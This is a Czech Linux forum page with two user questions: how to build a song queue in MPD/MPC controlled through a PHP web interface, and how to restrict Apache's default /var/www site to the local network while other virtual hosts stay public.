Protože chci provozovat hudbu přes webové rozhraní, tak jsem se dočetl o MPD & MPC...naprosto mi vyhovuje, udělal jsem si v php GUI, kterým ovládám MPC a funguje velmi dobře ...co bych ale potřeboval a to jsem se už nedočetl (ani v man mpc nebo mpc help, ani na googlu, ani zde na fóru - ale možná jsem se špatně díval :) ) je např to, jak udělat frontu po sobě jdoucích písniček ... v Ubuntu používám normálně pro přehrávání hudby Audacious, kde zmáčknu klávesu "q" a naházím si do fronty písničky z playlistu a v tomto sledu mi pak tyto písničky hrají ...

Dá se tohle udělat i v MPC?? Mít playlist s XY písničkama a vytvořit si tuhle frontu?? Jdou pospřeházet písničky v playlistu tak, aby na první pozici byla ta, kterou chci (viz: mpc move <from> <to>  - Move song in playlist), ale kdyby zůstaly zachovány pozice a písnička ve frontě jen dostala nějaký příznak, byl bych asi radši ...pokud to ale nejde, tak co už, budu míchat pořadím ...


A ještě druhý dotaz, jestli jde nějak vyselectovat celkový čas hrané písničky...?

25
Zdravím,

mám nalinkované weby v sites-available, které se odkazují na disk /media/XY ...default nastavení je ve /var/www a já bych potřeboval, aby se právě do této default složky NEŠLO dostat z veřejného internetu (ale ostatní weby v sites-available aby fungovaly), čili aby to šlo POUZE z lokální sítě...jde to někde v apache nastavit, případně co konkrétně bych měl hledat?

děkuji

Stran: [1] 2 3 ... 6

Provoz zaštiťuje spolek OpenAlt.